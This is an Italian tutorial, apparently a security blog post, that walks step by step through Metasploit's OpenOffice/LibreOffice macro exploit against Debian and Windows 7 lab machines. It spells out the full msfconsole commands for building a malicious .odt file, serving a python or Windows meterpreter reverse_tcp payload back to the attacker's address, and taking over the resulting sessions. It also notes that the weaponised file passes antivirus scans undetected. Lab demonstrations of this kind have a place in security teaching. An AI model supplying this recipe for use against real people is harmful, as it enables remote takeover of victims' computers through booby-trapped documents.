In questo articolo presento l’ennesimo modulo di Metasploit. La particolarità di questo exploit è che, oltre ad essere relativamente recente, può essere utilizzato sia per attaccare una vittima Windows (anche Windows 10), sia contro un PC Linux, il che lo rende molto versatile. Sfrutta una vulnerabilità di OpenOffice e funziona anche con LibreOffice, le due suite di programmi open source da utilizzare come alternative al celebre Office di Microsoft. Nello specifico l’exploit in questione apre una connessione con la macchina attaccante grazie alle macro, procedure, ovvero insiemi di istruzioni, che servono per automatizzare una serie di azioni all’apertura di un file.
Ambiente di test
- Attacker: Kali Linux Rolling con indirizzo IP su LAN 192.168.1.5
- Vittima Linux: Debian 8 Jessie su VMWare Workstation Player
- Vittima Windows: Windows 7 Service Pack 1 su VMWare Workstation Player
Sembra scontato, ma affinché riusciamo ad utilizzare con successo questo exploit, è necessario che le vittime abbiano abilitato l’esecuzione delle macro su OpenOffice o LibreOffice.
Avviamo il database postgresql e msfconsole
service postgresql start msfconsole
e cambiamo il contesto di Metasploit per utilizzare l’exploit dedicato alle macro di OpenOffice
use exploit/multi/misc/openoffice_document_macro
Hacking Linux
Iniziamo prendendo il controllo del PC Linux con Debian Jessie. Di default Debian viene distribuito con LibreOffice installato: non c’è problema l’exploit funzionerà anche su questo software.
Configuriamo l’exploit come segue, utilizzando come payload un reverse tcp in python, e lo lanciamo
set SRVHOST [indirizzo_ip_attacker] set FILENAME [nome_file.odt] set TARGET 1 set PAYLOAD python/meterpreter/reverse_tcp set LHOST [indirizzo_ip_attacker] run
Metasploit si occupa di creare il file odt contenente le macro malevole, avviare il server per la consegna del payload e il listener sulla macchina attaccante.
Trasferiamo il file odt sulla vittima
e lo apriamo consentendo all’attacker la consegna e l’esecuzione del payload
digitando il comando jobs
vediamo l’exploit, mentre con il comando sessions -l
possiamo vedere la sessione attiva
iniziamo l’interazione con la sessione di Meterpreter con il comando sessions -i [numero_sessione]
, infine il comando sysinfo
ci conferma la riuscita del procedimento
Hacking Windows
Il procedimento è molto simile al precedente, fatta eccezione per il payload. Sebbene io l’abbia testata su Windows 7, dovrebbe funzionare senza intoppi anche su Windows 10.
Ripartiamo configurando e lanciando l’exploit
set SRVHOST [indirizzo_ip_attacker] set FILENAME [nome_file.odt] set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [indirizzo_ip_attacker] run
Non avendo specificato il TARGET, l’exploit lo imposta automaticamente su Windows, quello di default
Trasferiamo il file sulla vittima
Questo exploit su Windows risulta particolarmente efficace, perché anche se scansioniamo il file con un buon software antivirus, non viene rilevata nessuna minaccia, insomma il file viene considerato sicuro
Apriamo il file sulla vittima e ancora una volta elenchiamo le sessioni attive, iniziamo l’interazione con la sessione di Meterpreter e ci accertiamo che tutto funzioni correttamente
sessions -l sessions -i [numero_sessione] sysinfo